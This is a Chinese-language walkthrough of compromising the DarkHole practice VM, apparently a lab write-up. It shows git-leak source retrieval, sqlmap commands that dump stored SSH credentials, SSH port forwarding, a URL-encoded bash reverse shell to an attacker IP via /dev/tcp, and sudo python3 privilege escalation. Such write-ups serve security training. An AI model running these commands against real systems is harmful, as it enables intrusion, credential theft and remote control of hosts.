DarkHole靶机渗透

一、信息收集

主机发现
一
端口探测,开放了22和80端口
在这里插入图片描述
目录扫描发现git信息泄露
在这里插入图片描述
下载git源码
​python2 GitHack.py http://192.168.226.134/.git
在这里插入图片描述
在这里插入图片描述
将./git下载到本地 wget -r http://192.168.226.134/.git
在这里插入图片描述
git clone .git webapp 创建一个webapp的源码文件,可以在其中执行所有 git 操作。
在这里插入图片描述
在git日志当中存在修改记录,切换到该条记录下 查看登录文件发现账号密码
在这里插入图片描述
登陆后台
在这里插入图片描述

二、漏洞利用

sqlmap -u http://192.168.226.134/dashboard.php?id=1 --cookie=PHPSESSID=n1nklviu5hj7ua488jjvkki1do --dbs
在这里插入图片描述
sqlmap -u http://192.168.226.134/dashboard.php?id=1 --cookie=PHPSESSID=n1nklviu5hj7ua488jjvkki1do -D darkhole_2 --tables
在这里插入图片描述
sqlmap -u http://192.168.226.134/dashboard.php?id=1 --cookie=PHPSESSID=n1nklviu5hj7ua488jjvkki1do -D darkhole_2 -T ssh --dump
在这里插入图片描述
ssh登录:jehad:fool
在这里插入图片描述
查看历史执行命令,执行curl “http://127.0.0.1:9999/?cmd=id”,losy用户
在这里插入图片描述
由于只能本地访问,使用SSH -L本地转发功能,在本地监听一个端口,使用ssh jehad@192.168.226.134 -L 9999:127.0.0.1:9999将目标靶机的本地9999映射到本地9999端口。
在这里插入图片描述
进行url编码执行,开启监听,反弹shell
curl “http://127.0.0.1:9999/?cmd=%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%32%32%36%2e%31%32%39%2f%31%32%33%34%20%30%3e%26%31%27”
在这里插入图片描述

三、提权

查询历史命令,cat .bash_history,发现密码
在这里插入图片描述
升级shell python3 -c ‘import pty;pty.spawn(“/bin/bash”)’,可以以root身份执行/usr/bin/python3。
利用sudo /usr/bin/python3 -c 'import os; os.system(“/bin/sh”)'提权
在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值